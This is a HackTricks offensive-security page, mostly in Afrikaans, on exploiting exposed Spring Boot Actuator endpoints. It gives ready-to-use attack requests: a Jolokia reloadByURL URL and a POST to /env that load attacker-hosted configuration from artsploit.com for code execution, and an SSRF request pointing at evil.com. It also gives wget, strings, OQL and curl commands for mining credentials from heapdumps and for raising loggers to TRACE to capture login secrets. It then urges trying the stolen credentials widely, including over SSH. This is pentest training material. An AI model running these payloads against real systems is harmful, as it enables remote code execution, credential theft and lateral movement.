HackTricksSpring Actuators
Reading time: 6 minutes
tip
Leer en oefen AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: 
HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking: 
HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.
Spring Auth Bypass
.png)
From https://raw.githubusercontent.com/Mike-n1/tips/main/SpringAuthBypass.png
Exploiting Spring Boot Actuators
Check the original post from [https://www.veracode.com/blog/research/exploiting-spring-boot-actuators]
Belangrike punte:
- Spring Boot Actuators registreer endpoints soos
/health,/trace,/beans,/env, ens. In weergawes 1 tot 1.4 is hierdie endpoints toeganklik sonder verifikasie. Vanaf weergawe 1.5 af is slegs/healthen/infostandaard nie-sensitief, maar ontwikkelaars deaktiveer dikwels hierdie sekuriteit. - Sekere Actuator-endpoints kan sensitiewe data openbaar of skadelike aksies toelaat:
/dump,/trace,/logfile,/shutdown,/mappings,/env,/actuator/env,/restart, and/heapdump.- In Spring Boot 1.x word actuators geregistreer onder die root-URL, terwyl in 2.x hulle onder die
/actuator/basispad val.
Exploitation Techniques:
- Remote Code Execution via '/jolokia':
- Die
/jolokiaactuator-endpoint openbaar die Jolokia Library, wat HTTP-toegang tot MBeans moontlik maak. - Die
reloadByURLaksie kan uitgebuit word om logging-konfigurasies vanaf 'n eksterne URL te herlaai, wat kan lei tot blind XXE of Remote Code Execution via geskepte XML-konfigurasies. - Example exploit URL:
http://localhost:8090/jolokia/exec/ch.qos.logback.classic:Name=default,Type=ch.qos.logback.classic.jmx.JMXConfigurator/reloadByURL/http:!/!/artsploit.com!/logback.xml.
- Config Modification via '/env':
- As Spring Cloud Libraries teenwoordig is, laat die
/envendpoint toe dat omgewings-eienskappe gewysig word. - Eienskappe kan gemanipuleer word om kwesbaarhede te benut, soos die XStream deserialisasie-kwesbaarheid in die Eureka serviceURL.
- Example exploit POST request:
POST /env HTTP/1.1
Host: 127.0.0.1:8090
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
eureka.client.serviceUrl.defaultZone=http://artsploit.com/n/xstream
- Ander nuttige instellings:
- Eienskappe soos
spring.datasource.tomcat.validationQuery,spring.datasource.tomcat.url, enspring.datasource.tomcat.max-activekan gemanipuleer word vir verskeie exploits, soos SQL injection of die verandering van databasis-verbindingstringe.
Bykomende inligting:
- 'n Omvattende lys van default actuators is te vind here.
- Die
/envendpoint in Spring Boot 2.x gebruik JSON-formaat vir eienskap-wysigings, maar die algemene konsep bly dieselfde.
Verwante onderwerpe:
- Env + H2 RCE:
- Details on exploiting the combination of
/envendpoint and H2 database can be found here.
- SSRF on Spring Boot Through Incorrect Pathname Interpretation:
- Die Spring-framework se hantering van matrix-parameters (
;) in HTTP-padname kan uitgebuit word vir Server-Side Request Forgery (SSRF). - Example exploit request:
http
GET ;@evil.com/url HTTP/1.1
Host: target.com
Connection: close
HeapDump geheime myning (credentials, tokens, internal URLs)
As /actuator/heapdump blootgestel is, kan jy gewoonlik 'n volledige JVM heap snapshot kry wat dikwels live secrets bevat (DB creds, API keys, Basic-Auth, interne service-URL's, Spring property maps, ens.).
- Download en vinnige triage:
bash
wget http://target/actuator/heapdump -O heapdump
# Quick wins: look for HTTP auth and JDBC
strings -a heapdump | grep -nE 'Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client'
# Decode any Basic credentials you find
printf %s 'RXhhbXBsZUJhc2U2NEhlcmU=' | base64 -d
- Dieper analise met VisualVM en OQL:
- Open heapdump in VisualVM, inspekteer instances van
java.lang.Stringof hardloop OQL om secrets te jaag:
select s.toString()
from java.lang.String s
where /Authorization: Basic|jdbc:|password=|spring\.datasource|eureka\.client|OriginTrackedMapPropertySource/i.test(s.toString())
- Geautomatiseerde ekstraksie met JDumpSpider:
bash
java -jar JDumpSpider-*.jar heapdump
Tipiese hoë-waarde bevindinge:
- Spring
DataSourceProperties/HikariDataSourceobjekke waturl,username,passwordblootstel. OriginTrackedMapPropertySourceinskrywings watmanagement.endpoints.web.exposure.include, dienspoorte, en ingebedde Basic-Auth in URL's (bv. EurekadefaultZone) openbaar.- Platte HTTP request/response fragmente insluitend
Authorization: Basic ...wat in geheue vasgevang is.
Wenk:
- Gebruik 'n Spring-gefokusde woordlys om actuator endpoints vinnig te ontdek (bv. SecLists spring-boot.txt) en kontroleer altyd of
/actuator/logfile,/actuator/httpexchanges,/actuator/env, en/actuator/configpropsook blootgestel is. - Credentials uit heapdump werk dikwels vir aangrensende dienste en soms vir stelselsgebruikers (SSH), so probeer dit wyd.
Misbruik van Actuator loggers/logging om credentials vas te vang
As management.endpoints.web.exposure.include dit toelaat en /actuator/loggers blootgestel is, kan jy dinamies logvlakke verhoog na DEBUG/TRACE vir pakkette wat authentication en request verwerking hanteer. Gekombineer met leesbare logs (via /actuator/logfile of bekende log-paaie) kan dit credentials lek wat tydens login flows ingestuur is (bv. Basic-Auth headers of form parameters).
- Enumereer en verhoog sensitiewe loggers:
bash
# List available loggers
curl -s http://target/actuator/loggers | jq .
# Enable very verbose logs for security/web stacks (adjust as needed)
curl -s -X POST http://target/actuator/loggers/org.springframework.security \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.web \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
curl -s -X POST http://target/actuator/loggers/org.springframework.cloud.gateway \
-H 'Content-Type: application/json' -d '{"configuredLevel":"TRACE"}'
- Vind waar logs geskryf word en oes:
bash
# If exposed, read from Actuator directly
curl -s http://target/actuator/logfile | strings | grep -nE 'Authorization:|username=|password='
# Otherwise, query env/config to locate file path
curl -s http://target/actuator/env | jq '.propertySources[].properties | to_entries[] | select(.key|test("^logging\\.(file|path)"))'
- Trigger login/authentication verkeer en parse die log vir creds. In microservice-opstellings met 'n gateway voor auth, maak die aktivering van TRACE vir gateway/security pakkette dikwels headers en form bodies sigbaar. Sommige omgewings genereer selfs sintetiese login verkeer periodiek, wat oes maklik maak sodra logging verbose is.
Notas:
- Stel logvlakke terug as jy klaar is:
POST /actuator/loggers/<logger>met{ "configuredLevel": null }. - As
/actuator/httpexchangesblootgestel is, kan dit ook onlangse request metadata oppervlakte wat sensitiewe headers mag insluit.
References
- Exploring Spring Boot Actuator Misconfigurations (Wiz)
- VisualVM
- JDumpSpider
- 0xdf – HTB Eureka (Actuator heapdump to creds, Gateway logging abuse)
tip
Leer en oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer en oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Leer en oefen Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)
Ondersteun HackTricks
- Kyk na die subskripsie planne!
- Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
- Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.